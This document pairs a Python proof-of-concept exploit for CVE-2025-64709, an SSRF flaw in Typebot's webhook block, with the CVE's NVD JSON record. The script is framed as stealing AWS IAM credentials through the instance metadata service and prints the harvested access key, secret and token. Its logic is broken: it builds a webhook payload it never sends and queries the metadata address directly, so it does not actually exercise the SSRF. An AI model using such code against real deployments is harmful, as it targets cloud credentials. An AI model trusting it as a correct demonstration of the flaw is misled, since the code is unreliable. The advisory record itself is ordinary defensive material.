CVE-2025-64709

#!/usr/bin/env python3 """ CVE-2025-64709 PoC - Typebot SSRF to AWS IMDS Credential Theft Note: This is for authorized security testing only """ import requests import json TARGET_URL = "http://target-typebot-instance.com" WORKSPACE_ID = "your-workspace-id" def exploit_ssrf(): """Exploit SSRF to steal AWS credentials via IMDSv2 bypass""" # Step 1: Create webhook block payload with SSRF webhook_payload = { "type": "webhook", "options": { "url": "http://169.254.169.254/latest/api/token", "method": "PUT", "headers": { "X-aws-ec2-metadata-token-ttl-seconds": "21600" } } } # Step 2: Get IMDSv2 token token_response = requests.put( "http://169.254.169.254/latest/api/token", headers={"X-aws-ec2-metadata-token-ttl-seconds": "21600"}, timeout=5 ) imds_token = token_response.text # Step 3: Request IAM credentials credentials_url = "http://169.254.169.254/latest/meta-data/iam/security-credentials/" cred_response = requests.get( credentials_url, headers={"X-aws-ec2-metadata-token": imds_token}, timeout=5 ) # Step 4: Parse and extract AWS credentials role_name = cred_response.text.strip() final_url = f"http://169.254.169.254/latest/meta-data/iam/security-credentials/{role_name}" aws_creds = requests.get( final_url, headers={"X-aws-ec2-metadata-token": imds_token}, timeout=5 ).json() print("[+] Stolen AWS Credentials:") print(f" AccessKeyId: {aws_creds.get('AccessKeyId')}") print(f" SecretAccessKey: {aws_creds.get('SecretAccessKey')}") print(f" Token: {aws_creds.get('Token')}") return aws_creds if __name__ == "__main__": print("[*] CVE-2025-64709 Typebot SSRF Exploit") print("[*] Target: Steal AWS IMDS credentials via webhook") exploit_ssrf()

{"cve": {"id": "CVE-2025-64709", "sourceIdentifier": "[email protected]", "published": "2025-11-13T20:15:53.053", "lastModified": "2026-01-30T14:23:42.560", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Typebot is an open-source chatbot builder. In versions prior to 3.13.1, a Server-Side Request Forgery (SSRF) vulnerability in the Typebot webhook block (HTTP Request component) functionality allows authenticated users to make arbitrary HTTP requests from the server, including access to AWS Instance Metadata Service (IMDS). By bypassing IMDSv2 protection through custom header injection, attackers can extract temporary AWS IAM credentials for the EKS node role, leading to complete compromise of the Kubernetes cluster and associated AWS infrastructure. Version 3.13.1 fixes the issue."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N", "baseScore": 9.6, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 5.8}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.9, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.1, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:typebot:typebot:*:*:*:*:*:-:*:*", "versionEndExcluding": "3.13.1", "matchCriteriaId": "C3C6D327-65E0-402A-AA2C-7879B7C472E4"}]}]}], "references": [{"url": "https://github.com/baptisteArno/typebot.io/security/advisories/GHSA-8gq9-rw7v-3jpr", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}